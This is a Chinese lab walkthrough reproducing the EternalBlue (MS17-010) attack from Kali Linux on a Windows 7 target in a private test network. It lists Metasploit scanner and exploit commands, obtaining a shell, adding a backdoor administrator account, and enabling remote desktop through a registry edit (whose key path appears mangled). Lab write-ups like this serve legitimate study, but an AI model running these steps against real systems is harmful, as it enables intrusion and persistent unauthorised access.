参考:利用永恒之蓝(MS17010)漏洞攻击靶机
MS17010漏洞复现和利用
相关环境
攻击机:Kali-linux 2023.2a 靶机:Windows 7 SP1旗舰版
获取靶机IP地址
打开cmd查看ip地址
代码语言:javascript复制ipconfig
关闭防火墙,检查通讯状态
需要关闭靶机的防火墙
打开网络和共享中心
进入windows防火墙设置
成功关闭防火墙
检查通讯状况
在kali linux里
代码语言:javascript复制ping 192.168.137.130
在windows 7里
代码语言:javascript复制ping 192.168.137.128
两边都ping得通,说明通讯正常
攻击步骤
检查是否存在漏洞
运行postgresql数据库
代码语言:javascript复制service postgresql start
打开msf
代码语言:javascript复制msfconsole
使用相关模块
代码语言:javascript复制use auxiliary/scanner/smb/smb_ms17_010
查看相关配置信息
代码语言:javascript复制show options
设置目标IP为靶机的IP
代码语言:javascript复制set rhost 192.168.137.130
开始对靶机进行扫描
代码语言:javascript复制run
发现漏洞并攻击
搜索msf17010漏洞模块
代码语言:javascript复制search ms17-010
使用该漏洞模块进行攻击
代码语言:javascript复制use exploit/windows/smb/ms17_010_eternalblue
查看其配置详情
代码语言:javascript复制show options
设置靶机IP
代码语言:javascript复制set rhost 192.168.137.130
使用exploit或者run命令进行攻击
代码语言:javascript复制exploit
获取shell
代码语言:javascript复制shell
利用漏洞提权
创建管理员账户
代码语言:javascript复制net user pigpig 123456 /add
我们在win7那边已经可以看到了
增加管理员权限
代码语言:javascript复制net localgroup administrators pigpig /add
在去win7那边观察
开启3389端口并远程访问控制
将win7靶机那边远程服务打开
代码语言:javascript复制REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
打开3389端口之后,在新的shell里
代码语言:javascript复制rdesktop 192.168.137.130:3389
点击yes之后,就可以在kali里面进入到win7靶机了。
输入账户密码回车,点了同意靶机的管理员账户就会掉线
成功进入了